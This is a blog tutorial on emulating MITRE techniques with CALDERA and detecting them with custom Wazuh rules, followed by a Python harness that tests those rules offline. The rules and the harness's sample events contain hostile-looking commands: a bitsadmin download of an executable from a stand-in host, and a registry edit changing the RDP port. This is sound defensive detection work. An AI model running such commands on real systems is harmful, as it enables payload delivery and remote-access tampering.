Adversary emulation with Caldera and Wazuh: Part 02

This entry is part 2 of 5 in the series Wazuh - SIEM and XDR


Deploy agents on the target machines

We deploy three Wazuh agents: two on Windows hosts and one on a Linux host.

Configure Sysmon

Sysmon must already be installed on the Windows hosts; Wazuh only reads the event channel that Sysmon writes to. We configure the agent to forward Sysmon events by adding the following <localfile> block to the agent configuration file at "C:\Program Files (x86)\ossec-agent\ossec.conf":

<localfile>
  <location>Microsoft-Windows-Sysmon/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>

Restart the Wazuh agent after modifying the configuration file. With more than a handful of Windows agents, the same block is better pushed from the manager through centralized configuration: place it inside an <agent_config os="Windows"> section of /var/ossec/etc/shared/default/agent.conf instead of editing every ossec.conf by hand.

Detection using Wazuh

The techniques emulated against the Linux agent are detected by Wazuh's default ruleset; no custom rules are needed for them.

For the Windows agents we write custom rules, one per emulated technique. The following rules are added to /var/ossec/etc/rules/local_rules.xml on the Wazuh server.

<group name="windows">

  <rule id="180001" level="8" ignore="120">
    <if_group>windows</if_group>
    <match>bitsadmin.exe /transfer /Download /priority Foreground</match>
    <description>Suspicious download and execution with BITS job on $(win.system.computer)</description>
    <mitre>
      <id>T1197</id>
    </mitre>
  </rule>

  <rule id="180002" level="8" ignore="120">
    <if_group>windows</if_group>
    <match type="pcre2">(?i)(tshark|wireshark)</match>
    <description>Network sniffing tool discovered on $(win.system.computer)</description>
    <mitre>
      <id>T1040</id>
    </mitre>
  </rule>

  <rule id="180003" level="8" ignore="120">
    <if_group>windows</if_group>
    <field name="win.eventdata.commandline" type="pcre2"> reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\" /v PortNumber /t REG_DWORD *</field>
    <description>RDP port has been changed on $(win.system.computer)</description>
    <mitre>
      <id>T1021.001</id>
    </mitre>
  </rule>

</group>

Restart the Wazuh manager after adding the rules. A few points worth knowing about them before relying on them: Wazuh documents the ID range 100000 to 120000 for user-defined rules, so IDs such as 180001 to 180003 sit outside that range and are best moved into it to avoid clashing with IDs the built-in ruleset may use later; ignore="120" suppresses further alerts from a rule for 120 seconds after it fires, so a second attempt inside that window produces no new alert; rule 180001 and rule 180002 match against the whole event text, which means rule 180002 also fires on a legitimate Wireshark installation or any other Windows event that mentions tshark or wireshark. Run a captured event through /var/ossec/bin/wazuh-logtest on the manager to confirm each rule matches before restarting.
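The rules above can be checked offline before the manager is restarted. The following harness is an added example, not code from the original post or from Wazuh: it parses the three rules from a copy of the local_rules.xml content, lints the rule IDs against the documented custom range, and evaluates the rules against constructed Sysmon event ID 1 records shaped like the output of Wazuh's eventchannel decoder. It assumes a single <group> root, treats a <match> with no type as a plain substring (these patterns use none of the OSSEC match metacharacters), lets Python's re stand in for PCRE2 (equivalent for these patterns), compares field names case-insensitively, and uses sample command lines that are constructed rather than captured.

```python
"""Offline check of the custom Wazuh rules above (added example, not from the post or from Wazuh)."""
import json
import re
import xml.etree.ElementTree as ET

# Copy of the three rules added to /var/ossec/etc/rules/local_rules.xml.
LOCAL_RULES = r"""<group name="windows">
  <rule id="180001" level="8" ignore="120">
    <if_group>windows</if_group>
    <match>bitsadmin.exe /transfer /Download /priority Foreground</match>
    <description>Suspicious download and execution with BITS job on $(win.system.computer)</description>
    <mitre><id>T1197</id></mitre>
  </rule>
  <rule id="180002" level="8" ignore="120">
    <if_group>windows</if_group>
    <match type="pcre2">(?i)(tshark|wireshark)</match>
    <description>Network sniffing tool discovered on $(win.system.computer)</description>
    <mitre><id>T1040</id></mitre>
  </rule>
  <rule id="180003" level="8" ignore="120">
    <if_group>windows</if_group>
    <field name="win.eventdata.commandline" type="pcre2"> reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\" /v PortNumber /t REG_DWORD *</field>
    <description>RDP port has been changed on $(win.system.computer)</description>
    <mitre><id>T1021.001</id></mitre>
  </rule>
</group>"""

CUSTOM_ID_RANGE = range(100000, 120001)  # range Wazuh documents for user-defined rules


def load_rules(xml_text):
    """Parse a local_rules.xml with a single <group> root into rule dicts.

    Assumption: <match> with no type is a plain substring, and Python's re
    stands in for PCRE2 (equivalent for the patterns in this post).
    """
    rules = []
    for node in ET.fromstring(xml_text).iter("rule"):
        tests = []
        for m in node.findall("match"):
            pattern = re.compile(m.text) if m.get("type") == "pcre2" else m.text
            tests.append(("full_log", pattern))
        for f in node.findall("field"):
            tests.append((f.get("name").lower(), re.compile(f.text)))
        rules.append({
            "id": int(node.get("id")),
            "level": int(node.get("level")),
            "if_group": (node.findtext("if_group") or "").strip(),
            "mitre": [t.text for t in node.iter("id")],
            "tests": tests,
        })
    return rules


def lint_ids(rules):
    """Return rule IDs that fall outside the documented custom range."""
    return [r["id"] for r in rules if r["id"] not in CUSTOM_ID_RANGE]


def evaluate(rules, event):
    """Return the IDs of rules whose every condition holds for one decoded event.

    The event carries the raw log line (what <match> sees), the groups assigned by
    earlier rules (what <if_group> checks) and the decoded fields (what <field>
    checks). Field names are compared case-insensitively; an assumption here.
    """
    fields = {k.lower(): v for k, v in event["fields"].items()}
    hits = []
    for rule in rules:
        if rule["if_group"] not in event["groups"]:
            continue
        matched = True
        for target, pattern in rule["tests"]:
            text = event["full_log"] if target == "full_log" else fields.get(target, "")
            matched = pattern in text if isinstance(pattern, str) else pattern.search(text) is not None
            if not matched:
                break
        if matched:
            hits.append(rule["id"])
    return hits


def make_event(command_line):
    """Build a constructed Sysmon event ID 1 record shaped like Wazuh's eventchannel output."""
    raw = {"win": {"system": {"eventID": "1", "computer": "WIN-VICTIM"},
                   "eventdata": {"commandLine": command_line}}}
    fields = {"win.system.eventID": "1", "win.system.computer": "WIN-VICTIM",
              "win.eventdata.commandLine": command_line}
    return {"groups": {"windows", "sysmon"}, "full_log": json.dumps(raw), "fields": fields}


# Constructed command lines, not captured from a real host. The RDP sample comes in two
# spellings: rule 180003's pattern is written against backslash-escaped quotes and doubled
# backslashes, so only that spelling matches. Check which form Sysmon records on your hosts
# with wazuh-logtest before relying on the rule.
SAMPLE_EVENTS = {
    "bits_download": make_event(
        r"bitsadmin.exe /transfer /Download /priority Foreground http://192.0.2.10/a.exe C:\Users\Public\a.exe"),
    "sniffer": make_event(r'"C:\Program Files\Wireshark\tshark.exe" -i 1 -c 100'),
    "rdp_escaped": make_event(
        r'cmd.exe /c reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 3390 /f'),
    "rdp_plain": make_event(
        r'cmd.exe /c reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3390 /f'),
    "benign": make_event(r"C:\Windows\System32\svchost.exe -k netsvcs"),
}


def run_samples():
    """Map each sample name to the rule IDs it triggers."""
    rules = load_rules(LOCAL_RULES)
    return {name: evaluate(rules, event) for name, event in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    print("rule IDs outside the custom range:", lint_ids(load_rules(LOCAL_RULES)))
    for name, hits in run_samples().items():
        print(f"{name:13} -> {hits or 'no alert'}")
```

The harness is a quick sanity check of the patterns, not a substitute for wazuh-logtest, which runs the real decoders and the full ruleset; the two spellings of the reg command exist precisely so the reader sees that the rule depends on how the command line is quoted by the tool that launches it.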

Set up adversary profiles with MITRE techniques

Linux endpoint

From the CALDERA web interface, open the adversaries section and create a new adversary profile. For this post the profile is named Linux-Adver-Profile, with the description Linux MITRE techniques so it is easy to identify.

After creating the profile, add the MITRE techniques to emulate using CALDERA's Add Ability feature.

Windows endpoint

We create an adversary profile named Windows-Adver-Profile, with the description Windows MITRE techniques so it is easy to identify.

After creating the profile, we add the MITRE techniques using CALDERA's Add Ability feature. We add the three techniques the custom rules above are written for, T1197 (BITS Jobs), T1040 (Network Sniffing) and T1021.001 (Remote Services: Remote Desktop Protocol), as shown in the image below. Click Save Profile to save the abilities to the profile.

Run operations for the two adversary profiles

To run the attack against the endpoints, we follow these steps:

  • Navigate to the operations section and create a new operation.
  • Give the operation a name and select one of the two adversary profiles: the Linux profile for the Linux endpoint, or the Windows profile for the Windows endpoints.
  • Click Start to run the operation. When it has completed, click Stop, which begins the cleanup process for the executed abilities.

Windows victims

Operation executed on the Windows agents:

Wazuh detection

Linux victim

Operation executed on the Linux agent:

Wazuh detection

Conclusion

CALDERA lets us emulate known adversary behaviour against our own endpoints, and Wazuh detects that activity with its default ruleset where coverage already exists and with custom rules, written and tested against the emulated techniques, where it does not.
